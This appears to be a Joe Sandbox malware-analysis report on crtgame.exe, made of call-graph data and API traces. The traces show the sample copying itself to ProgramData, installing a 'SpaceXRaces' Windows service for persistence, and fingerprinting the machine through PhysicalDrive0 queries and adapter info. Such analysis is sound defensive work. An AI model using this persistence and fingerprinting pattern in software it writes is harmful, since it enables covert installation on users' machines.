2188->2189 2190 403b6c HeapAlloc 2188->2190 2191 403b89 VirtualAlloc 2189->2191 2190->2191 2196 403bc1 2190->2196 2192 403ba9 VirtualAlloc 2191->2192 2193 403c7e 2191->2193 2194 403c70 VirtualFree 2192->2194 2192->2196 2195 403c86 HeapFree 2193->2195 2193->2196 2194->2193 2195->2196 2196->2071 2198 402dac GetVersionExA 2197->2198 2198->2177 2198->2178 2204 404db3 2199->2204 2203 40314c 2202->2203 2203->2180 2206 404dcb 2204->2206 2208 404dfb 2206->2208 2211 405afa 2206->2211 2207 405afa 6 API calls 2207->2208 2208->2207 2210 404daf 2208->2210 2215 405a2e 2208->2215 2210->2185 2212 405b18 2211->2212 2214 405b0c 2211->2214 2221 405dbe 2212->2221 2214->2206 2216 405a59 2215->2216 2219 405a3c 2215->2219 2217 405a75 2216->2217 2218 405afa 6 API calls 2216->2218 2217->2219 2233 405b6f 2217->2233 2218->2217 2219->2208 2222 405def GetStringTypeW 2221->2222 2226 405e07 2221->2226 2224 405e0b GetStringTypeA 2222->2224 2222->2226 2223 405e32 GetStringTypeA 2227 405ef3 2223->2227 2224->2226 2224->2227 2226->2223 2228 405e56 2226->2228 2227->2214 2228->2227 2229 405e6c MultiByteToWideChar 2228->2229 2229->2227 2230 405e90 2229->2230 2230->2227 2231 405eca MultiByteToWideChar 2230->2231 2231->2227 2232 405ee3 GetStringTypeW 2231->2232 2232->2227 2234 405bbb 2233->2234 2235 405b9f LCMapStringW 2233->2235 2238 405c21 2234->2238 2239 405c04 LCMapStringA 2234->2239 2235->2234 2236 405bc3 LCMapStringA 2235->2236 2236->2234 2237 405cfd 2236->2237 2237->2219 2238->2237 2240 405c37 MultiByteToWideChar 2238->2240 2239->2237 2240->2237 2241 405c61 2240->2241 2241->2237 2242 405c97 MultiByteToWideChar 2241->2242 2242->2237 2243 405cb0 LCMapStringW 2242->2243 2243->2237 2244 405ccb 2243->2244 2245 405cd1 2244->2245 2247 405d11 2244->2247 2245->2237 2246 405cdf LCMapStringW 2245->2246 2246->2237 2247->2237 2248 405d49 LCMapStringW 2247->2248 2248->2237 2249 405d61 WideCharToMultiByte 2248->2249 2249->2237 2260 402ed2 2251->2260 2254 403068 2255 403071 2254->2255 2256 403076 2254->2256 2297 404c10 2255->2297 2303 404c49 2256->2303 2261 402ecf 2260->2261 2263 402ed9 2260->2263 2261->2075 2261->2254 2263->2261 2264 402efe 2263->2264 2265 402f0d 2264->2265 2268 402f22 2264->2268 2272 402f1b 2265->2272 2273 4036a3 2265->2273 2267 402f61 HeapAlloc 2269 402f70 2267->2269 2268->2267 2268->2272 2279 403e50 2268->2279 2269->2263 2270 402f20 2270->2263 2272->2267 2272->2269 2272->2270 2275 4036d5 2273->2275 2274 403783 2274->2272 2275->2274 2278 403774 2275->2278 2286 4039ac 2275->2286 2278->2274 2293 403a5d 2278->2293 2284 403e5e 2279->2284 2280 403f4a VirtualAlloc 2285 403f1b 2280->2285 2281 40401f 2282 403b58 5 API calls 2281->2282 2282->2285 2284->2280 2284->2281 2284->2285 2285->2272 2287 4039ef HeapAlloc 2286->2287 2288 4039bf HeapReAlloc 2286->2288 2290 403a15 VirtualAlloc 2287->2290 2292 403a3f 2287->2292 2289 4039de 2288->2289 2288->2292 2289->2287 2291 403a2f HeapFree 2290->2291 2290->2292 2291->2292 2292->2278 2294 403a6f VirtualAlloc 2293->2294 2296 403ab8 2294->2296 2296->2274 2298 404c1a 2297->2298 2299 404c47 2298->2299 2300 404c49 7 API calls 2298->2300 2299->2256 2301 404c31 2300->2301 2302 404c49 7 API calls 2301->2302 2302->2299 2305 404c5c 2303->2305 2304 404d73 2307 404d86 GetStdHandle WriteFile 2304->2307 2305->2304 2306 404c9c 2305->2306 2311 40307f 2305->2311 2308 404ca8 GetModuleFileNameA 2306->2308 2306->2311 2307->2311 2309 404cc0 2308->2309 2312 4058a7 2309->2312 2311->2075 2313 4058b4 LoadLibraryA 2312->2313 2315 4058f6 2312->2315 2314 4058c5 GetProcAddress 2313->2314 2313->2315 2314->2315 2316 4058dc GetProcAddress GetProcAddress 2314->2316 2315->2311 2316->2315 2318 4030bd 2317->2318 2326 4030d9 2317->2326 2321 4030c7 2318->2321 2322 4030dd 2318->2322 2319 403108 2320 403109 HeapFree 2319->2320 2320->2326 2321->2320 2323 4030d3 2321->2323 2322->2319 2325 4030f7 2322->2325 2328 40337a 2323->2328 2334 403e0b 2325->2334 2326->2106 2329 4033b8 2328->2329 2333 40366e 2328->2333 2330 4035b4 VirtualFree 2329->2330 2329->2333 2331 403618 2330->2331 2332 403627 VirtualFree HeapFree 2331->2332 2331->2333 2332->2333 2333->2326 2335 403e38 2334->2335 2336 403e4e 2334->2336 2335->2336 2338 403cf2 2335->2338 2336->2326 2341 403cff 2338->2341 2339 403daf 2339->2336 2340 403d20 VirtualFree 2340->2341 2341->2339 2341->2340 2343 403c9c VirtualFree 2341->2343 2344 403cb9 2343->2344 2345 403ce9 2344->2345 2346 403cc9 HeapFree 2344->2346 2345->2341 2346->2341 2348 405894 2347->2348 2349 40589b 2347->2349 2351 4054c7 2348->2351 2349->2112 2358 405660 2351->2358 2355 40550a GetCPInfo 2357 40551e 2355->2357 2356 405654 2356->2349 2357->2356 2363 405706 GetCPInfo 2357->2363 2359 405680 2358->2359 2360 405670 GetOEMCP 2358->2360 2361 4054d8 2359->2361 2362 405685 GetACP 2359->2362 2360->2359 2361->2355 2361->2356 2361->2357 2362->2361 2365 405729 2363->2365 2370 4057f1 2363->2370 2364 405dbe 6 API calls 2366 4057a5 2364->2366 2365->2364 2367 405b6f 9 API calls 2366->2367 2368 4057c9 2367->2368 2369 405b6f 9 API calls 2368->2369 2369->2370 2370->2356 2372 40273c GetCommandLineW CommandLineToArgvW GetLocalTime 2371->2372 2373 401fbe 2372->2373 2374 401fd3 2373->2374 2403 401a1d 2374->2403 2376 401fdc 2376->2141 2376->2142 2378 402569 2377->2378 2379 402576 GetModuleHandleA GetModuleFileNameA 2378->2379 2380 402ec0 12 API calls 2379->2380 2381 402595 2380->2381 2382 402ec0 12 API calls 2381->2382 2383 4025a6 2382->2383 2384 4025db GetModuleHandleA GetModuleFileNameW RegOpenKeyExA 2383->2384 2385 4026d6 2384->2385 2386 402616 RegQueryValueExA 2384->2386 2385->2142 2385->2154 2386->2385 2387 402640 RegCloseKey 2386->2387 2388 402654 2387->2388 2389 402660 CreateDirectoryA 2388->2389 2390 402676 2389->2390 2391 402688 CopyFileA 2390->2391 2391->2385 2392 40269e OpenSCManagerA 2391->2392 2392->2385 2393 4026af CreateServiceA 2392->2393 2394 4026dd CloseServiceHandle CloseServiceHandle 2393->2394 2395 4026cd CloseServiceHandle 2393->2395 2394->2385 2395->2385 2397 402362 WaitForSingleObject 2396->2397 2398 402368 2397->2398 2399 4023cc ExitProcess 2397->2399 2401 4023b1 Sleep 2398->2401 2441 4021c6 VirtualAlloc 2398->2441 2448 401ffb FindResourceA 2398->2448 2401->2397 2404 401a2c 2403->2404 2411 401a58 CreateFileA 2404->2411 2410 401a47 2410->2376 2412 401a86 2411->2412 2413 401a35 2411->2413 2414 401aa1 DeviceIoControl 2412->2414 2415 401b43 CloseHandle 2412->2415 2417 401b17 GetLastError 2412->2417 2431 402d06 2412->2431 2434 402cf8 2412->2434 2419 401b54 LoadLibraryA 2413->2419 2414->2412 2415->2413 2417->2412 2417->2415 2420 401b77 GetProcAddress 2419->2420 2421 401a3e 2419->2421 2422 401c21 FreeLibrary 2420->2422 2423 401b8e 2420->2423 2428 401c2f 2421->2428 2422->2421 2424 401b9e GetAdaptersInfo 2423->2424 2425 402d06 7 API calls 2423->2425 2426 401c1e 2423->2426 2427 402cf8 12 API calls 2423->2427 2424->2423 2425->2423 2426->2422 2427->2423 2437 401c5b GetWindowsDirectoryA 2428->2437 2430 401c3e 2430->2410 2432 4030b1 7 API calls 2431->2432 2433 402d0f 2432->2433 2433->2412 2435 402ed2 12 API calls 2434->2435 2436 402d03 2435->2436 2436->2412 2438 401cb7 2437->2438 2439 401c7e CreateFileA 2437->2439 2438->2430 2439->2438 2440 401ca2 GetFileTime CloseHandle 2439->2440 2440->2438 2445 4021f8 2441->2445 2442 40230a 2444 402331 Sleep 2442->2444 2443 402293 GetLastError LoadLibraryExA 2443->2445 2446 402347 2444->2446 2445->2442 2445->2443 2447 4022dc GetProcAddress 2445->2447 2446->2398 2447->2445 2449 402036 2448->2449 2450 40201d GetLastError SizeofResource 2448->2450 2449->2398 2450->2449 2451 40203d LoadResource LockResource GlobalAlloc 2450->2451 2452 402069 2451->2452 2453 402092 GetTickCount 2452->2453 2455 40209c GlobalAlloc 2453->2455 2455->2449 2457 4041d7 GetCurrentProcess TerminateProcess 2456->2457 2460 4041e8 2456->2460 2457->2460 2458 403049 2458->2170 2459 404252 ExitProcess 2460->2458 2460->2459 2466 405c83 2467 405c92 2466->2467 2468 405c97 MultiByteToWideChar 2467->2468 2472 405cfd 2467->2472 2469 405cb0 LCMapStringW 2468->2469 2468->2472 2470 405ccb 2469->2470 2469->2472 2471 405cd1 2470->2471 2473 405d11 2470->2473 2471->2472 2474 405cdf LCMapStringW 2471->2474 2473->2472 2475 405d49 LCMapStringW 2473->2475 2474->2472 2475->2472 2476 405d61 WideCharToMultiByte 2475->2476 2476->2472 2478 4023d3 2479 402425 2478->2479 2480 4023da 2478->2480 2480->2479 2481 4023e5 GetLastError SetServiceStatus SetEvent 2480->2481 2481->2479 2505 405d37 2506 405d45 2505->2506 2507 405d49 LCMapStringW 2506->2507 2510 405cfd 2506->2510 2508 405d61 WideCharToMultiByte 2507->2508 2507->2510 2508->2510 2492 402428 RegisterServiceCtrlHandlerA 2493 402541 2492->2493 2494 40244b 2492->2494 2495 402459 SetServiceStatus GetLastError CreateEventA 2494->2495 2496 4024d2 SetServiceStatus CreateThread WaitForSingleObject CloseHandle 2495->2496 2497 4024b3 GetLastError 2495->2497 2498 402538 SetServiceStatus 2496->2498 2497->2498 2498->2493 2511 404b38 2512 404bca 2511->2512 2514 404b56 2511->2514 2513 404a40 RtlUnwind 2513->2514 2514->2512 2514->2513 2461 4041cb 2462 4041d7 GetCurrentProcess TerminateProcess 2461->2462 2465 4041e8 2461->2465 2462->2465 2463 404262 2464 404252 ExitProcess 2465->2463 2465->2464 2515 405ebb 2516 405ec2 2515->2516 2517 405ef3 2516->2517 2518 405eca MultiByteToWideChar 2516->2518 2518->2517 2519 405ee3 GetStringTypeW 2518->2519 2519->2517 2482 40305d 2489 4041ba 2482->2489 2484 403068 2485 403076 2484->2485 2486 404c10 7 API calls 2484->2486 2487 404c49 7 API calls 2485->2487 2486->2485 2488 40307f 2487->2488 2490 4041cb 3 API calls 2489->2490 2491 4041c7 2490->2491 2491->2484

                                                                          Callgraph

                                                                          • Executed
                                                                          • Not Executed
                                                                          • Opacity -> Relevance
                                                                          • Disassembly available
                                                                          callgraph 0 Function_00404A40 1 Function_00402548 65 Function_00402EC0 1->65 72 Function_00402DD0 1->72 79 Function_00402DE0 1->79 105 Function_00402CA0 1->105 2 Function_00404C49 52 Function_00402D20 2->52 58 Function_00405930 2->58 2->72 2->79 109 Function_004058A7 2->109 3 Function_0040334F 4 Function_00405150 5 Function_00403E50 11 Function_00403B58 5->11 12 Function_00404058 5->12 5->105 6 Function_00401051 7 Function_00402351 67 Function_004021C6 7->67 86 Function_00401FF7 7->86 89 Function_00401FFB 7->89 8 Function_00401B54 38 Function_00402D06 8->38 8->52 70 Function_004018CC 8->70 87 Function_00402CF8 8->87 9 Function_00404A58 10 Function_00401A58 10->38 10->52 10->70 10->87 11->105 13 Function_00405359 14 Function_0040445A 24 Function_00403068 14->24 14->52 14->65 14->72 96 Function_0040588B 14->96 115 Function_004030B1 14->115 15 Function_00401C5B 16 Function_0040305D 16->2 45 Function_00404C10 16->45 119 Function_004041BA 16->119 17 Function_00403A5D 18 Function_00404A60 19 Function_00405660 20 Function_00404760 21 Function_00402960 20->21 20->65 20->115 22 Function_00403162 44 Function_00405110 22->44 62 Function_00403135 22->62 71 Function_00404FD0 22->71 98 Function_00405090 22->98 103 Function_00404D9C 22->103 106 Function_00402DA0 22->106 23 Function_00404264 24->2 24->45 25 Function_00405368 26 Function_00402B69 27 Function_00405B6F 101 Function_00405D93 27->101 27->106 28 Function_00402F72 28->14 28->20 31 Function_0040417C 28->31 32 Function_0040427E 28->32 36 Function_00404402 28->36 47 Function_00404513 28->47 83 Function_004026F0 28->83 97 Function_0040308D 28->97 100 Function_00404892 28->100 110 Function_004041A9 28->110 111 Function_004032AA 28->111 29 Function_00402B78 30 Function_0040337A 30->4 31->23 124 Function_004043BF 32->124 33 Function_00405C7F 34 Function_00401000 35 Function_0040A400 95 Function_00405485 36->95 36->96 37 Function_00405706 37->27 123 Function_00405DBE 37->123 38->115 39 Function_00403307 40 Function_0040A408 41 Function_00403E0B 84 Function_00403CF2 41->84 42 Function_00404B0D 43 Function_0040530E 45->2 46 Function_00405210 47->24 47->65 47->96 114 Function_004045AC 47->114 48 Function_00404B16 49 Function_0040311A 50 Function_00401A1D 50->8 50->10 55 Function_00401029 50->55 57 Function_00401C2F 50->57 92 Function_00401982 50->92 51 Function_00402B1E 53 Function_00402A20 54 Function_00402428 54->105 56 Function_00405A2E 56->27 88 Function_00405AFA 56->88 57->15 57->70 59 Function_00404B30 59->0 59->48 93 Function_00404A82 59->93 60 Function_00402132 61 Function_00405D33 63 Function_00405D37 64 Function_00404B38 64->0 64->48 64->93 73 Function_00402ED2 65->73 66 Function_00404FC5 67->21 67->60 67->105 68 Function_004054C7 68->19 68->37 78 Function_004056DD 68->78 112 Function_004056AA 68->112 69 Function_004041CB 69->23 70->6 70->21 70->34 73->49 91 Function_00402EFE 73->91 74 Function_004023D3 75 Function_004092D3 76 Function_004051D5 77 Function_00402DD7 80 Function_004029E5 81 Function_00404AEA 82 Function_004051EC 83->1 83->7 83->52 83->72 83->79 83->105 122 Function_00401FBE 83->122 104 Function_00403C9C 84->104 85 Function_00404BF5 85->93 87->73 88->123 89->21 121 Function_00401CBD 89->121 90 Function_004029FC 91->5 108 Function_004036A3 91->108 92->6 92->21 92->34 92->105 93->48 94 Function_00405C83 94->106 102 Function_00405496 95->102 96->68 97->2 97->45 99 Function_00405390 100->24 100->65 116 Function_00404DB3 103->116 107 Function_00402BA0 108->17 113 Function_004039AC 108->113 110->69 111->11 111->22 111->39 115->3 115->30 115->41 117 Function_00403DB4 115->117 116->56 116->88 118 Function_00405EB7 119->69 120 Function_00405EBB 122->50 122->105 123->105 123->106

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00402714
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\CRTGame\crtgame.exe,00000104,?,00000000), ref: 0040272B
                                                                          • GetCommandLineW.KERNEL32(?,?,00000000), ref: 00402748
                                                                          • CommandLineToArgvW.SHELL32(00000000,?,00000000), ref: 0040274F
                                                                          • GetLocalTime.KERNEL32(00409F20,?,00000000), ref: 0040275C
                                                                          • lstrcmpiW.KERNELBASE(?,/chk,?,00000000), ref: 0040277E
                                                                          • CreateFileA.KERNEL32(C:\Program Files (x86)\CRTGame\crtgame.exe,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000), ref: 004027CB
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004027D2
                                                                          • ExitProcess.KERNEL32 ref: 004027D9
                                                                          • lstrcmpiW.KERNEL32(?,00407104,?,00000000), ref: 004027FB
                                                                          • RegCreateKeyExA.KERNELBASE(80000002,Software\SpaceRaces,00000000,00000000,00000000,00000006,00000000,?,?,?,00000000), ref: 0040282A
                                                                          • GetTickCount.KERNEL32 ref: 0040284D
                                                                          • wsprintfA.USER32 ref: 00402865
                                                                          • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 00402888
                                                                          • RegCloseKey.KERNELBASE(?), ref: 00402891
                                                                          • StartServiceCtrlDispatcherA.ADVAPI32(?,?,00000000), ref: 0040294C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCommandCreateFileHandleLineModulelstrcmpi$ArgvCountCtrlDispatcherExitLocalNameProcessServiceStartTickTimeValuewsprintf
                                                                          • String ID: /chk$C:\Program Files (x86)\CRTGame\crtgame.exe$Software\SpaceRaces$SpaceXRaces$SpaceXRaces$test$tsr1209%d
                                                                          • API String ID: 99468869-3986529438
                                                                          • Opcode ID: 803341d37248f940fd6434f59c57290a4552a2c8ba3ceefaceaf479661161746
                                                                          • Instruction ID: 49dc81ac6bcf3fd683536614608e289c009f5af55911e209b1bd681bcac14ea3
                                                                          • Opcode Fuzzy Hash: 803341d37248f940fd6434f59c57290a4552a2c8ba3ceefaceaf479661161746
                                                                          • Instruction Fuzzy Hash: 4B5131B1940209BFEB10DBA09E49FAE7BBCEB04345F104076F606F21E1D7789D148B69

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,00000000,7591F360,00000000), ref: 00402582
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,?,?,00000000,7591F360,00000000), ref: 00402589
                                                                          • GetModuleHandleA.KERNEL32(00000000,00000208,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360), ref: 004025EA
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360,00000000), ref: 004025F1
                                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,?), ref: 00402608
                                                                          • RegQueryValueExA.KERNELBASE(?,Common AppData,00000000,00000001,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,?), ref: 00402632
                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360,00000000), ref: 00402643
                                                                          • CreateDirectoryA.KERNELBASE(C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000), ref: 00402665
                                                                          • CopyFileA.KERNEL32(?,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000), ref: 00402694
                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 004026A2
                                                                          • CreateServiceA.ADVAPI32(00000000,SpaceXRaces,SpaceXRaces,000F01FF,00000010,00000002,00000001,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000,00000000,00000000,00000000,00000000), ref: 004026C3
                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 004026D0
                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E4
                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Handle$CloseModuleService$File$CreateNameOpen$CopyDirectoryManagerQueryValue
                                                                          • String ID: .exe$C:\ProgramData\SpaceXRaces\SpaceXRaces.exe$Common AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$SpaceXRaces
                                                                          • API String ID: 3461818117-4011302265
                                                                          • Opcode ID: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
                                                                          • Instruction ID: a3d5b12e1f90bb5d6e2ef9e639674f7dcae6e36a2f4b11c7066e8bc7fc52f7b9
                                                                          • Opcode Fuzzy Hash: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
                                                                          • Instruction Fuzzy Hash: 264193B1940108BBEB20ABA1DE4EE9F3A6CEF41749F00043AF601B11D2D7BD5D508A7D

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 65 401b54-401b71 LoadLibraryA 66 401b77-401b88 GetProcAddress 65->66 67 401c2a-401c2e 65->67 68 401c21-401c24 FreeLibrary 66->68 69 401b8e-401b97 66->69 68->67 70 401b9e-401bae GetAdaptersInfo 69->70 71 401bb0-401bb9 70->71 72 401be4-401bec 70->72 75 401bca-401be0 call 402d20 call 4018cc 71->75 76 401bbb-401bbf 71->76 73 401bf5-401bf9 72->73 74 401bee-401bf4 call 402d06 72->74 79 401bfb-401bff 73->79 80 401c1e-401c20 73->80 74->73 75->72 76->72 81 401bc1-401bc8 76->81 79->80 84 401c01-401c04 79->84 80->68 81->75 81->76 86 401c06-401c0c 84->86 87 401c0f-401c1c call 402cf8 84->87 86->87 87->70 87->80
                                                                          APIs
                                                                          • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B66
                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B7D
                                                                          • GetAdaptersInfo.IPHLPAPI(?,00000400,00000000,00000000,00000000), ref: 00401BA6
                                                                          • FreeLibrary.KERNEL32(00401A3E), ref: 00401C24
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                          • API String ID: 514930453-3667123677
                                                                          • Opcode ID: a9615e917c7d8da21abece12906e102e054d7a7f96f05c26df3a9cf8b4b55db1
                                                                          • Instruction ID: 19d1f7c7220f150a124496b0f3bded62544c7fcf715814b2fda3adae34ef3130
                                                                          • Opcode Fuzzy Hash: a9615e917c7d8da21abece12906e102e054d7a7f96f05c26df3a9cf8b4b55db1
                                                                          • Instruction Fuzzy Hash: 9D21B870944209AFEF21DFA5C9447EFBBB4EF45344F0440BAE504B22E1E7789A85CB69

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 91 401a58-401a80 CreateFileA 92 401a86-401a9a 91->92 93 401b4e-401b53 91->93 94 401aa1-401ac9 DeviceIoControl 92->94 95 401acb-401ad3 94->95 96 401afc-401b04 94->96 97 401ad5-401adb 95->97 98 401add-401ae2 95->98 99 401b06-401b0c call 402d06 96->99 100 401b0d-401b10 96->100 97->96 98->96 103 401ae4-401afa call 402d20 call 4018cc 98->103 99->100 101 401b12-401b15 100->101 102 401b43-401b4d CloseHandle 100->102 106 401b30-401b3d call 402cf8 101->106 107 401b17-401b20 GetLastError 101->107 102->93 103->96 106->94 106->102 107->102 109 401b22-401b25 107->109 109->106 112 401b27-401b2d 109->112 112->106
                                                                          APIs
                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00401A74
                                                                          • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401ABB
                                                                          • GetLastError.KERNEL32 ref: 00401B17
                                                                          • CloseHandle.KERNELBASE(?), ref: 00401B46
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                          • String ID: \\.\PhysicalDrive0
                                                                          • API String ID: 4026078076-1180397377
                                                                          • Opcode ID: 4b276423cefb6535b93749f4a35407bbc40f2b1ddf316d430708a30b7fc217e3
                                                                          • Instruction ID: 2ab55ed144571c3fa2fc985b9ad89e39486dc60e53794fabb09e903d28ee3d3f
                                                                          • Opcode Fuzzy Hash: 4b276423cefb6535b93749f4a35407bbc40f2b1ddf316d430708a30b7fc217e3
                                                                          • Instruction Fuzzy Hash: 9E317A71D00118AADB21EF96CD849EFBBB9EF40750F20817AE515B22A0E3785E45CF98

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetVersion.KERNEL32 ref: 00402F98
                                                                            • Part of subcall function 004032AA: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FD1,00000000), ref: 004032BB
                                                                            • Part of subcall function 004032AA: HeapDestroy.KERNEL32 ref: 004032FA
                                                                          • GetCommandLineA.KERNEL32 ref: 00402FE6
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 00403011
                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403034
                                                                            • Part of subcall function 0040308D: ExitProcess.KERNEL32 ref: 004030AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                          • String ID:
                                                                          • API String ID: 2057626494-0
                                                                          • Opcode ID: 6973291a08a62e7008eca22fd321bc7397b23a4f1d73c5b2d439b14b6e22de47
                                                                          • Instruction ID: 67841cd3009d396f381f20147254ff52d2e2d79fbc7827c85a5f588a1a3baf3d
                                                                          • Opcode Fuzzy Hash: 6973291a08a62e7008eca22fd321bc7397b23a4f1d73c5b2d439b14b6e22de47
                                                                          • Instruction Fuzzy Hash: 24217FB1800714AADB04AFA6DD0AA6E7BB9EB45704F10413EFA05BB2D1DB384850CB59

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 144 401c5b-401c7c GetWindowsDirectoryA 145 401cb7-401cbc 144->145 146 401c7e-401ca0 CreateFileA 144->146 146->145 147 401ca2-401cb1 GetFileTime CloseHandle 146->147 147->145
                                                                          APIs
                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00401C74
                                                                          • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 00401C95
                                                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00401CA8
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00401CB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateDirectoryHandleTimeWindows
                                                                          • String ID:
                                                                          • API String ID: 87451460-0
                                                                          • Opcode ID: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
                                                                          • Instruction ID: cc4b8a8173e68006100f6bb5cfe5cbca554eec38252bcd741f722b6c7c402e1e
                                                                          • Opcode Fuzzy Hash: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
                                                                          • Instruction Fuzzy Hash: 7CF0E27668021077E6209B359E8DFCB3AAD9BC6B60F010134BB46F21D0D6B49551C6B4

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 148 4041cb-4041d5 149 4041d7-4041e2 GetCurrentProcess TerminateProcess 148->149 150 4041e8-4041fe 148->150 149->150 151 404200-404207 150->151 152 40423c-404250 call 404264 150->152 154 404209-404215 151->154 155 40422b-40423b call 404264 151->155 161 404262-404263 152->161 162 404252-40425c ExitProcess 152->162 158 404217-40421b 154->158 159 40422a 154->159 155->152 163 40421d 158->163 164 40421f-404228 158->164 159->155 163->164 164->158 164->159
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(?,?,004041B6,?,00000000,00000000,00403049,00000000,00000000), ref: 004041DB
                                                                          • TerminateProcess.KERNEL32(00000000,?,004041B6,?,00000000,00000000,00403049,00000000,00000000), ref: 004041E2
                                                                          • ExitProcess.KERNEL32 ref: 0040425C
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
